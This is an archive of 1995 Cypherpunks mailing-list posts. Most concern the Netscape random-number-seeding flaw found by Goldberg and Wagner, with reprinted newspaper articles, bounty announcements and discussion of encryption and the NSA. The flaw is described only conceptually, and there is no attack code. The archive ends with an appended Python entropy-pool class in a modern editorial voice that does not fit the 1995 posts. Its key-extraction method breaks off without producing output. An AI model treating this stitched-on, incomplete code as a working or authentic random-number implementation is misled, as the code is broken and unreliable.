For Immediate Release Contact: sameer at c2.org 510-601-9777 COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS Sept 19 1995 - Community ConneXion, a privacy server and ISP in Berkeley, California, today announced that it will be offering an incentive to the net to expose security flaws in some software that is advertised on the net as secure. 
This weekend a member of the cypherpunks community, Ian Goldberg, and his officemate, David Wagner, revealed a method which would allow someone to break the encryption used by Netscape Navigator in 25 seconds. Netscape Communications Corporation has been advertising their products as a "secure" way of communicating sensitive information over the net. People have been using this Netscape software to send their credit card numbers over the net, communicate with their brokers, and other tasks requiring security. "Netscape was apparently relying on security by obscurity in this case," said Community ConneXion's founder, Sameer Parekh. In light of this recent break and the earlier two brute force attacks on the encryption used in the international version of Netscape Navigator (crippled because of restrictions on the export of cryptography from the United States) Community ConneXion has offered a challenge to the net community to find more holes. Ian, David, and the people responsible for the brute-force attacks will be receiving free limited-edition T-shirts for their work. "The more holes people find, the more holes will get fixed. Netscape makes the most widely used commercial WWW software out there, so it is in the net's best interest for netscape to have good security. By exposing the holes in netscape, we will hopefully get them fixed," said Sameer. Details about the HackNetscape promotion are available from http://www.c2.org/hacknetscape, or by sending mail to hacknetscape at c2.org. Community ConneXion is the premier internet privacy ISP. They offer anonymous accounts, remailers, and pseudonym servers, in addition to the standard ISP fare of webspace and dialup IP access. Information is available from http://www.c2.org or mailing info at c2.org. Netscape and Netscape Navigator are trademarks of Netscape Communications Corporation. This promotion is not affiliated with NCC. 
From carolann at censored.org Mon Sep 18 19:16:52 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Mon, 18 Sep 95 19:16:52 PDT Subject: John Young You are KEWL! Message-ID: <199509190216.TAA05926@usr2.primenet.com> It is really nice what you're doing here. It is appreciated. Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- http://dcs.ex.ac.uk/~aba/export/ From tcmay at got.net Mon Sep 18 19:22:18 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 18 Sep 95 19:22:18 PDT Subject: Caribbean Internet Services? (fwd) Message-ID: At 1:00 AM 9/19/95, Jim Choate wrote: >> ObCypherpunks Relevance: A couple of past or current list members have >> nascent Internet plans in some of these islands. (I think one of them is >> way south, just off Venezuela.) >> >> I suspect "Caribbean Data Havens" and "Internet Sites" are further off than >> they were a few months ago. >> > >Satellite dishes and a steady supply of gasoline via a couple of tankers >would make such an operation completely portable. A more ideal solution >would be to moore a ship in international waters (wasn't some group wanting >to do this for 'humanitarian' reasons or somesuch?). Sure, there are possible fixes to the various problems. I'm not saying the Caribbean will shut down, only that this will likely increase operating costs, in at least some of the areas, and will frighten off some investors. Human nature. The model need not be physical sites in these locales, of course. But even maintaining a business office in some of these locales will be a hassle. 
(This is where I expect the usual folks will jump in and shout "On the contrary!" Note however, how few of them actually live in St. Barts, or Anguilla, or Curacao, or the Bahamas.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sameer at c2.org Mon Sep 18 19:23:37 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 19:23:37 PDT Subject: Hack Netscape! In-Reply-To: Message-ID: <199509190217.TAA07775@infinity.c2.org> Community ConneXion doesn't have the budget to give a free T-shirt to everyone who helped. ;-) You can buy one of the general release t-shirts we'll be making though. > > On Mon, 18 Sep 1995, sameer wrote: > > > The T-shirt isn't designed yet but I think the web page can > > take public consumption now. Check out http://www.c2.org/hacknetscape > > Heh, what about a shirt for the people who worked through keyspace for > the second crack? ;) > > -Thomas > -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From warlord at MIT.EDU Mon Sep 18 19:25:07 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 18 Sep 95 19:25:07 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: <1818@bjohns.win.net> Message-ID: <199509190224.WAA03110@toxicwaste.media.mit.edu> Hi. PGP 2.6.2 compiles out-of-the-box on Linux. In fact, Linux is my personal development platform at home, so I make sure that it works. Just "make" in rsaref/install/unix, and then "make linux" in src. If you are in the US or Canada, you can get PGP 2.6.2 from MIT. 
Here are the instructions: The file ftp://net-dist.mit.edu/pub/PGP/README contains instructions on how to download PGP 2.6.2. Included therein are Binaries for DOS and Mac, and the sources for DOS, Unix and Mac. To read these files you should log in with username anonymous and use your email address as the password. Alternatively, you can use the WWW interface to get to these packages. Just connect to the PGP-form web page and follow the instructions: http://bs.mit.edu:8001/pgp-form.html -derek From yihchun at u.washington.edu Mon Sep 18 19:45:22 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Mon, 18 Sep 95 19:45:22 PDT Subject: PGP for Linux 1.2.8 In-Reply-To: <1818@bjohns.win.net> Message-ID: On Mon, 18 Sep 1995, Bret A. Johnson wrote: > Can anyone tell me where a version of PGP 2.62 can be found for Linux? > I got one off of ftp.berkeley.edu (pgp262s.zip) and it (or I can not > get it) to compile on my system.. It compiled on mine just fine. Be sure you have an up to date bintools and gcc. 1. Make sure you are using 2.5.2/2.6.3. That's how I compiled mine. 2. Unzip the source in /usr/src/pgp (or wherever) 3. cd /usr/src/pgp/rsaref/install/unix 4. make 5. cd /usr/src/pgp/src 6. make linux And you should have a pgp binary. 7. cp /usr/src/pgp/src/pgp /usr/local/bin/pgp Though they might differ, the MD5 hash of my Linux version is f7dd657c0c5ed8a5cb7c5dfcf5af6c5b. Good luck! 
+---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +---- Random Thought ------------------------------------------------------+ |I conducted an experiment to test Murphy's Law, but everything went wrong.| +--------------------------------------------------------------------------+ From rah at shipwright.com Mon Sep 18 20:15:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Sep 95 20:15:33 PDT Subject: Hurricane Luis in Anguilla / Cellphone Antenna Message-ID: --- begin forwarded text Date: Mon, 18 Sep 1995 13:24:33 +24000 From: Vincent Cate Subject: Hurricane Luis in Anguilla / Cellphone Antenna To: Steve Roberts cc: Technomads MIME-Version: 1.0 Hurricane Luis took Anguilla apart. The three utility poles right near my house all blew down. My house, computers, etc are all fine. Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems there were many people killed. They have a lot of poor people there and also a lot of people used to live in boats. More than 1,000 of about 1,400 boats sank. The eye went right over Anguilla. For awhile it was calm enough that everyone went outside to stretch and say hi to everyone. Overall it took about 4 days to pass. It has been nice to have solar panels, batteries, an inverter, etc. I did not have a cellphone, but I do now. And now that I have one I am really interested in the directional antenna that might let me reach other islands - in particular the US Virgin islands where long distance rates are $0.10/min at night with sprint instead of the $2/min that we pay here in Anguilla. 
Does anyone know where I can order a directional cellphone antenna (boat antenna) good for 100 miles? -- Vince --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jya at pipeline.com Mon Sep 18 20:35:19 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Sep 95 20:35:19 PDT Subject: NYT on Netscape Crack Message-ID: <199509190300.XAA05027@pipe4.nyc.pipeline.com> The New York Times, September 19, 1995, pp. A1, D21. Security Flaw Is Discovered In Software Used in Shopping By John Markoff San Francisco, Sept. 18 -- A serious security flaw has been discovered in Netscape, the most popular software used for computer transactions over the Internet's World Wide Web, threatening to cast a chill over the emerging market for electronic commerce. The flaw, which could enable a knowledgeable criminal to use a computer to break Netscape's security coding system in less than a minute, means that no one using the software can be certain of protecting credit card information, bank account numbers or other types of information that Netscape is supposed to keep private during on-line transactions. The weakness was identified by two first-year graduate students in computer science at the University of California at Berkeley, who published their findings on an Internet mailing list Sunday evening. Although the Netscape Communications Corporation, which produces the software, said today that the flaw could be fixed and that new copies of the software would be distributed as early as next week, Internet experts said the discovery underscored the danger of assuming that any computer security system was safe. 
"There needs to be much more public auditability in the way these financial security systems are designed and implemented," said Eric Hughes, president of Open Financial Networks, a company in Berkeley that is developing Internet commerce systems. The Netscape software is already used by an estimated eight million people for navigating the World Wide Web portion of the Internet. On the Web, thousands of companies offer text, images, video and audio information, much of it as a way of advertising or directly selling goods and services. Because the Netscape software is not only easy to use but has also been promoted as a secure way of dealing with personal and financial information, it has been seen as the emerging de facto standard for on-line commerce. Already, a diverse group of companies -- including Wells Fargo Bank, MCI Communications, Internet Shopping Network and Virtual Vineyards -- have adopted Netscape as the vehicle for checking bank balances, catalogue shopping or buying wine on line. Although Internet experts agreed with the company's assessment that the flaw could be fixed and that it posed no risk to people who use the World Wide Web only to retrieve nonsensitive data, the security problem's disclosure may represent a public relations setback for Netscape Communications and an inconvenience to millions of people who may feel a need to replace the version of Netscape installed on their computers. Last month the company's shares began public trading and had one of the most successful first days in Wall Street's history, largely on the resounding popularity of the Netscape software. Today, as word of the security flaw circulated only within fairly small circles of Internet users, Netscape's stock closed with a slight loss, down 75 cents, to $52.50, in low Nasdaq trading volume. The company said it would release a repaired version of the software within a week. 
Users will be able to download it free over the Internet, through the Netscape site on the World Wide Web (http://home.netscape.com).

The company had previously announced a next-generation version of Netscape that it said would be more secure than the original, and it said today that it would release this updated version within the next few weeks. But first it will remove the newly disclosed flaw, which is currently in the new version.

"The good news and the bad news of the Internet is that when you put something up there, many more people can test it," said Mike Homer, the vice president of marketing at Netscape. "You also give yourself the opportunity of having people point things out which you can fix quickly."

The company so far has distributed most copies of its program free over the Internet, under a strategy of making its money from commercial customers who use Netscape to provide services or for other business applications over the World Wide Web. So replacing the copies will not be an expensive undertaking.

Instead, for Netscape Communications and for other companies betting their futures on the Internet, the real cost of this disclosure may be in the public's shaken confidence in the ability of computer companies to insure privacy and security for on-line commerce.

The weakness in Netscape's security was discovered by Ian Goldberg, 22, and David Wagner, 21, two computer science students who share an office at the university and who also share an interest in the arcane science of cryptography, which is becoming increasingly important for business as companies begin to explore electronic commerce.

The two students said they had decided to put the software to a test in an effort to raise public concern about placing too much trust in unproved electronic security systems.
Netscape's security is based on a type of coding technology known generically as public key cryptography in which users exchange mathematically generated numbers -- or keys -- to encode or decode information. In such systems, a new key is created for each information exchange, based on a mathematical formula that is combined with numbers supposedly known only to the sender or recipient.

The students found that by determining how Netscape's formula generated the number used as a starting point for creating a key, they were able to greatly reduce the potential combinations that would unlock the code.

The starting-point number turned out to be based on the time and date of the transaction, combined with several other unique bits of information taken from a user's computer system -- bits of information that an electronic intruder could determine, if he were intent on intercepting a Netscape user's transactions.

Knowing how the starting-point number was created greatly reduced the other possible components of the formula -- and the students found they were able to break the code in a matter of seconds using a standard computer work station.

Netscape officials said today that they would strengthen the system, by making it significantly harder to determine the random number at the heart of their coding system. They said they would no longer disclose what data would be used to generate the random numbers.

The announcement of the flaw was posted Sunday night on a computer network mailing list maintained by an informal group known as Cypherpunks. The group, which is made up of mathematicians, computer experts and privacy advocates, has been campaigning for more effective electronic security systems.

The discovery is the second reported security weakness in the Netscape program to be posted on the Cypherpunks list in the last month.
In August, Damien Doligez, a student at the Ecole Polytechnique in Paris, used a network of 120 computers, running for eight days, to generate a Netscape secret key. But his was a "brute force" attack, requiring the computers to sample a vast range of numbers before coming up with a key that would break the code. The Berkeley students, in contrast, by identifying a basic flaw in the way Netscape set up its security system, were able to narrowly focus their attack to quickly break the code, with far less computer power.

[End]

From don at cs.byu.edu Mon Sep 18 20:50:14 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Mon, 18 Sep 95 20:50:14 PDT
Subject: Musings
Message-ID: <199509190256.UAA00267@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I noticed Sameer's release had some nice shots at ITAR. Heh. When aiming for outsiders, it might be productive to explain what cpunks do in an I'm-ok-you're-ok sorta way. For example, "the cryptographic research group 'cypherpunks'..."

ObHackNetscape: I was thinking last night about the process of verifying that someone had swept the keyspace that they claimed to have swept. (Umm, well, so much for Mozilla, but ya know, next time...) and I wanted to run this idea past Those Who Know[tm]:

When doling out a segment of 16M keys, attach results of two randomly chosen garbage decryptions. The bruter has to report back which two keys they are. The overhead would add up, but I don't think it would be significant. Or if a stronger method is needed, provide the MD5 hash of the garbage decryptions. Maybe with a discriminator or something, so you only MD5 a few thousand.

Anyway, the idea is that if you have to prove that you swept a big enough chunk to find the two keys, you've proven that you've swept a great portion of the keyspace. Of course, this does nothing to prevent _withholding_ a result. But it does prove that most of the keyspace has been swept; and most likely the search continued even after the two keys are found.
This would make it much more possible to give consolation prizes without worrying about false NAKs of big segments. If anyone is still interested in that idea.

ObFactoring: Picked up the Quadratic Sieve factoring program from Mathworks. Haven't had a chance to compile it yet, but Bob Silverman told me in email he was willing to make it available to a group such as [The Cryptographic Research Foundation] Cypherpunks.

ObHamilton '95: Pulled up my tomorrow's stock pages. Netscape takes a big hit, but not big enough for a foolish thing like that. I hope none of my banks go around setting their safe combinations to 1234 or anything... ;|

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMF4xO8La+QKZS485AQFQtQL/f9bmpnGT/3FfB2rqnFmMltJEkgY8/Oym
Vtkzm6xrlApY7b9b2UhVvPXurHU8DBAZeqj5Yu7VvLsQ+w3YelGEAYfzdhECk2t/
5NRYi0RkgFkIs+XCuDGVkoSXExT++KsZ
=V54e
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From perry at piermont.com Mon Sep 18 20:55:59 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 18 Sep 95 20:55:59 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <199509190355.XAA01329@frankenstein.piermont.com>

Markoff's article in the Times says:

> Netscape officials said today that they would strengthen
> the system, by making it significantly harder to determine
> the random number at the heart of their coding system. They
> said they would no longer disclose what data would be used
> to generate the random numbers.

Not, of course, that they disclosed it before -- it was found by reverse engineering the distributed executable.
Not, of course, that they have a choice in the matter of whether to disclose it -- they will be "disclosing" how it's done as soon as they release the code. Not, of course, that security through obscurity does any good -- it just magnifies the pain.

I suspect that there are far more flaws in Netscape. String buffer overflows are another good guess here -- they are probably rampant through the code both for the browser and the commerce server they sell. I can't prove it myself, of course, given that I don't have the time to rip the thing apart, but the same folks never seemed to learn their lesson in release after release when they worked at NCSA, and the only thing that's probably keeping their dignity here is the lack of distributed source code.

I'll pay for the "I broke Netscape's Security" T-Shirt for the enterprising person that takes the time to find them in the object code. (See Sameer's page on the shirts he's developing as prizes for the Netscape flaw finders.)

Two "I broke Netscape's Security" T-Shirts to that daring soul at Netscape who finds the next flaw and has the balls to mention it in public instead of sweeping it under the carpet -- even if the person is Marc Andreessen.

Perry

From kinney at bogart.Colorado.EDU Mon Sep 18 20:57:24 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Mon, 18 Sep 95 20:57:24 PDT
Subject: Good random seeds
In-Reply-To: <199509182042.QAA02146@homeport.org>
Message-ID: <199509190357.VAA22661@bogart.Colorado.EDU>

Adam Shostack writes:

> Since we can all see how badly time works, I'd like to point out
> that Will Price, author of the excellent Cryptdisk utility for the Mac,
> uses mouse movements to seed his PRNG.
>
> His code is available for a small fee, and I'd strongly suggest
> that people who need good, easy PRNs take a look at it, and also take a

Just to clear up a point of attribution, the core random number generator used by CryptDisk was designed and written by Colin Plumb, with a wrapper for the Macintosh written by me. Will (Price) told me that he has made some improvements to my original implementation for the latest version of CryptDisk, doing the clock timings more simply.

My code and Colin's are free, and I'd be happy to post the routines if there is interest.

-- Will

From adam at homeport.org Mon Sep 18 21:04:57 1995
From: adam at homeport.org (Adam Shostack)
Date: Mon, 18 Sep 95 21:04:57 PDT
Subject: Brute Force and Smart Force
Message-ID: <199509190405.AAA03711@homeport.org>

I think it's worth pointing out that instead of taking (arguably) $10,000 worth of computer time to brute force SSL, Goldberg-Wagner's attack exploits a weakness in the system to spend maybe a few dollars to crack it.

Clever attacks on cryptosystems like this are the bread and butter of 'practical' cryptanalysis. It might take until slightly after the heat death of the universe to break IDEA or your 2048 bit RSA key, but there exist other attacks, and they are the ones which will be exploited.

(Also, as Robert Morris pointed out, never underestimate the time, money or effort your opponent will put into cryptanalysis. Cypherpunks, collectively, have put a great deal of time, effort, and CPU into proving SSL bogus, and I don't think anyone here made any money doing it.)

Perhaps we should refocus our efforts on attacking PGP, to see if there are holes there? (I'm not suggesting there are, but it would be nice to see some code written to extend Crack to phrases, do some more code review, etc.)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From bdolan at use.usit.net Mon Sep 18 21:08:22 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Mon, 18 Sep 95 21:08:22 PDT
Subject: Hurricane Luis in Anguilla / Cellphone Antenna
In-Reply-To:
Message-ID:

Assuming your cellphone operates in the 800 MHz range, transmitting with about 1 W., I think you're out of luck. With UHF and particularly at low power levels, you just about have to be line-of-sight to the receiving antenna. Guessing how high up your antenna might be and how high the receiving antenna could be, I would say you would be lucky to achieve a range of 20 miles. I'd be astonished at anything over 50.

Brad

On Mon, 18 Sep 1995, Robert Hettinga wrote:

> --- begin forwarded text
>
> Date: Mon, 18 Sep 1995 13:24:33 +24000
> From: Vincent Cate
> Subject: Hurricane Luis in Anguilla / Cellphone Antenna
> To: Steve Roberts
> cc: Technomads
> MIME-Version: 1.0
>
> Hurricane Luis took Anguilla apart. The three utility poles right near my
> house all blew down. My house, computers, etc. are all fine.
>
> Nobody was killed in Anguilla, but in St Marten (5 miles away) it seems
> there were many people killed. They have a lot of poor people there
> and also a lot of people used to live in boats. More than 1,000 of
> about 1,400 boats sank.
>
> The eye went right over Anguilla. For awhile it was calm enough that
> everyone went outside to stretch and say hi to everyone. Overall it
> took about 4 days to pass.
>
> It has been nice to have solar panels, batteries, an inverter, etc. I did
> not have a cellphone, but I do now.
>
> And now that I have one I am really interested in the directional antenna
> that might let me reach other islands - in particular the US Virgin
> Islands where long distance rates are $0.10/min at night with Sprint
> instead of the $2/min that we pay here in Anguilla. Does anyone know
> where I can order a directional cellphone antenna (boat antenna) good for
> 100 miles?
>
> -- Vince
> --- end forwarded text
>
> -----------------
> Robert Hettinga (rah at shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From jlasser at rwd.goucher.edu Mon Sep 18 21:11:00 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Mon, 18 Sep 95 21:11:00 PDT
Subject: PGP for Linux 1.2.8
In-Reply-To: <199509190224.WAA03110@toxicwaste.media.mit.edu>
Message-ID:

On Mon, 18 Sep 1995, Derek Atkins wrote:

> Hi. PGP 2.6.2 compiles out-of-the-box on Linux. In fact, Linux is my
> personal development platform at home, so I make sure that it works.
> Just "make" in rsaref/install/unix, and then "make linux" in src.

Heh. It's not QUITE so simple. :)

If you're running an ELF system, you have to pretend it's a sys v system (or, alternatively, remove all the leading underscores in the .globl names in the assembly language (*.S) files).

Also, you should upgrade to the latest 1.2.x version of linux, as there was a fairly large memory leak until 1.2.11 or 1.2.12 or so...

OBCrypto: UNIX confuses me :)

Jon

------------------------------------------------------------------------------
Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From unicorn at polaris.mindport.net Mon Sep 18 21:15:19 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Mon, 18 Sep 95 21:15:19 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID:

On Mon, 18 Sep 1995, John Young wrote:

> The New York Times, September 19, 1995, pp. A1, D21.
>
> Security Flaw Is Discovered In Software Used in Shopping
>
> By John Markoff
>
> Today, as word of the security flaw circulated only within
> fairly small circles of Internet users, Netscape's stock
> closed with a slight loss, down 75 cents, to $52.50, in low
> Nasdaq trading volume.

Gotta like that open sell order. :)

---
"In fact, had Bancroft not existed,          potestas scientiae in usu est
Franklin might have had to invent him."      in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From Chris.Claborne at SanDiegoCA.ATTGIS.COM Mon Sep 18 21:17:59 1995
From: Chris.Claborne at SanDiegoCA.ATTGIS.COM (Chris Claborne)
Date: Mon, 18 Sep 95 21:17:59 PDT
Subject: Bidzos takes advantage of Netscape hole!
Message-ID: <9509190017.aa08714@ncrhub1.ATTGIS.COM>

The following article has a quote from Bidzos claiming that they offered to review the code but that Netscape declined. Of course the good student is going to have them review it... How about having Goldberg and Wagner review it for some bucks!!!

2 -- C --

----------------------------------------------------------
Netscape's Internet Software Contains Flaw That Jeopardizes Security of Data

By JARED SANDBERG
Staff Reporter of The Wall Street Journal

A serious security flaw has been found in Netscape Communications Corp.'s Internet software, jeopardizing sensitive financial data such as credit-card numbers that users pass over the global computer network.

The company acknowledged the flaw and said it's issuing a software fix. But as is often the case with Internet security, it may take time for users to adopt the fix, leaving them vulnerable meanwhile.

"It's a very big trapdoor," said Dietrich Kappe, a partner with Red Planet L.L.C., a Chicago Internet consulting firm. "You can drive a truck through it. Somebody goofed" at Netscape, he added.
The breach presents a problem for Netscape, which produces the most popular software for browsing the World Wide Web, the multimedia portion of the Internet where businesses are setting up electronic storefronts to sell goods and services. Netscape has captured roughly 75% of the "browser" market, reaching roughly eight million people, who use the Netscape product to browse the Web and make credit-card purchases. The breach also underscores the persistent security problems that have plagued the Internet and forestalled electronic commerce.

Netscape uses so-called symmetric key cryptography to scramble sensitive data so that they are unreadable by hackers snooping on the network. That key is essentially a mathematical formula so long that it makes it impractical for hackers to crack, even with powerful computers. The formula is generated by a random number that may be determined by the number of electronic-mail messages, for example. Netscape's software chooses a number between one and two-to-the-30th-power -- or roughly one billion.

But on Sunday night, two graduate students at the University of California at Berkeley posted a message to the Internet's "Cypherpunks" mailing list, a group of mathematicians and programmers who discuss the science of cryptography. In the electronic missive, they said that the random number that generates the mathematical key was "fairly trivial to guess" and that the key "usually takes less than one minute to find."

Rather than try to break the encryption "key," the two graduate students examined the so-called "random number generator" and discovered that the number isn't so random, allowing them to guess the encryption key. It took the two students, Ian Goldberg and David Wagner, two days to identify the vulnerability and write a software program that could guess the encryption key in less than one minute. Netscape's software, said Mr.
Goldberg, 22 years old, "is not as good as people thought, which is probably worse than no security" since people have a false sense of security as they enter payment details.

"The information we were using to create the key is now a known set of information," said Jeffrey Treuhaft, security product manager for Netscape. "We feel it's important to let our consumers know," he said, adding that the company will post a warning on its own Web site.

"It's a serious hole, but it can easily be corrected," said James Bidzos, president of RSA Data Security Inc., which licenses security technology that Netscape incorporates in its system. Netscape said it plans to have a software fix to resolve the problem available for downloading over the Internet by the end of this week.

RSA's Mr. Bidzos said his company offered to review Netscape's security when it first introduced its browser, but Netscape declined. "They're asking us to review it this time," he said.

A month ago, a student at France's Ecole Polytechnique cracked the same weaker encryption system that U.S. government policy forces Netscape to use in a foreign version of its Navigator software. To break the code, the student used 120 computer workstations and two supercomputers working for eight days to break the so-called 40-bit encryption system, a number that refers to length of the encoding "key," which is used to scramble data.

Netscape sells a far stronger version of its software that includes 128-bit key length, but is prevented by the government from distributing it on the Internet. The government fears that such strong encryption could fall into the hands of terrorists who might use it to communicate without fear of being tapped by U.S. security agencies. Security experts, however, noted that the same problem exists with the stronger software.

...

... __o
.. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com
...(*)/(*).
CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!

From unicorn at polaris.mindport.net Mon Sep 18 21:20:38 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Mon, 18 Sep 95 21:20:38 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com>
Message-ID:

I've been having mail problems of late.

Did you get my letter on your tax issue?

---
"In fact, had Bancroft not existed,          potestas scientiae in usu est
Franklin might have had to invent him."      in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From jya at pipeline.com Mon Sep 18 21:20:46 1995
From: jya at pipeline.com (John Young)
Date: Mon, 18 Sep 95 21:20:46 PDT
Subject: FC's Opus
Message-ID: <199509190420.AAA16227@pipe4.nyc.pipeline.com>

The NY Times reports in tomorrow's paper that it and The Washington Post are publishing the Unabomber's 35,000-word manifesto as a separate pullout in The Washington Post tomorrow, as advised by AG Reno and FBI Director Freeh.

From tcmay at got.net Mon Sep 18 21:23:36 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 18 Sep 95 21:23:36 PDT
Subject: NSA and Netscape Crack (Re: NYT on Netscape Crack)
Message-ID:

At 3:00 AM 9/19/95, John Young wrote:

> The New York Times, September 19, 1995, pp. A1, D21.
>
> Security Flaw Is Discovered In Software Used in Shopping
>
> By John Markoff
>
> The discovery is the second reported security weakness in
> the Netscape program to be posted on the Cypherpunks list
> in the last month. In August, Damien Doligez, a student at

Seriously, where's the NSA when you really need 'em?

If the "flaws" are being found by our group, as John notes, just what is the NSA doing in the _second_ role it is supposed to have, its "COMSEC," or communications security, role?
(Note: As outlined by Bamford, and others, the Agency has a dual role: penetrating communications it is chartered to penetrate, and helping to secure communications it is chartered to help secure. Traditionally, the penetrating side is called SIGINT or COMINT, and the securing side is called COMSEC. The names may have changed by now.)

Personally, I don't actually _want_ them vetting the work of others, but I think this whole series of events with Netscape makes it abundantly clear that the supposed "dual role" of the NSA in both breaking ciphers and in ensuring higher security is a farce.

If the NSA had not found the flaws our two Berkeley grad students found, we've grossly overestimated them as a threat. And if they found the flaws but said nothing, what does this say about their claimed COMSEC benefits to American interests? (Granted, not all of us are Americans, but I think you understand my point about the NSA claiming it has a role, then doing nothing concrete, and even being misleading in its plans and programs.)

If the NSA _really_ wants to really help secure communications against fraud, eavesdroppers, and foreign intelligence agencies, it can do so by immediately relaxing the restrictions on crypto export. While this may not stop things like weak random number generators, it moves us to an era of "strong" crypto and away from the "toy" crypto the NSA seems to want us to have.

I think, however, it's clear by now that they have little interest in helping to secure communications and that weak "toy" systems are their preference.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
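As an added example (not Colin Plumb's CryptDisk routines, and not Netscape's code) of the event-seeded generator Will Kinney describes earlier in this thread, set against the clock-and-process-data seed the Times article attributes to Netscape: an entropy pool that hashes every input sample into its state, credits each sample with a conservative entropy estimate, and refuses to hand out a session key until the credited total reaches the key size. The per-sample credits, the sample mouse events and the clock values are constructed assumptions, not measurements.

```python
import hashlib
import struct


class EntropyPool:
    """Hash-mixed entropy pool seeded from input events (added illustration).

    Every sample is folded into a SHA-256 chain and credited with an entropy
    estimate chosen by the caller.  Output is refused until the credited total
    reaches the number of bits the derived key is supposed to have, so a seed
    built only from guessable values can never produce a key.
    """

    STATE_BITS = 256  # the pool can never hold more than its state size

    def __init__(self, required_bits: int = 128):
        self.required_bits = required_bits
        self.credited_bits = 0.0
        # Fixed, public starting state: all unpredictability comes from the inputs.
        self._state = hashlib.sha256(b"entropy-pool-example").digest()

    def mix(self, sample: bytes, credit_bits: float) -> None:
        """Fold a sample into the pool and credit it with at most `credit_bits`."""
        self._state = hashlib.sha256(self._state + sample).digest()
        self.credited_bits = min(self.credited_bits + credit_bits, self.STATE_BITS)

    def add_mouse_event(self, x: int, y: int, ticks: int) -> None:
        """Pointer position plus a fine-grained tick count at the event.

        Positions are largely guessable; only the low bits of the timing are
        hard to predict, so each event is credited a constructed 2 bits."""
        self.mix(struct.pack(">iiQ", x, y, ticks), 2.0)

    def add_clock_and_pid(self, seconds: int, micros: int, pid: int) -> None:
        """Wall-clock time and a process identifier, the kind of seed material the
        Times piece describes.  Someone on the same host can narrow every field to
        a small window, so the credit is deliberately tiny (constructed 8 bits)."""
        self.mix(struct.pack(">QIi", seconds, micros, pid), 8.0)

    def ready(self) -> bool:
        return self.credited_bits >= self.required_bits

    def extract(self, nbytes: int) -> bytes:
        """Derive output from the state, then ratchet the state forward so that a
        later compromise of the pool does not reveal keys already handed out."""
        if not self.ready():
            raise RuntimeError(
                f"pool has {self.credited_bits:.0f} credited bits, "
                f"needs {self.required_bits}"
            )
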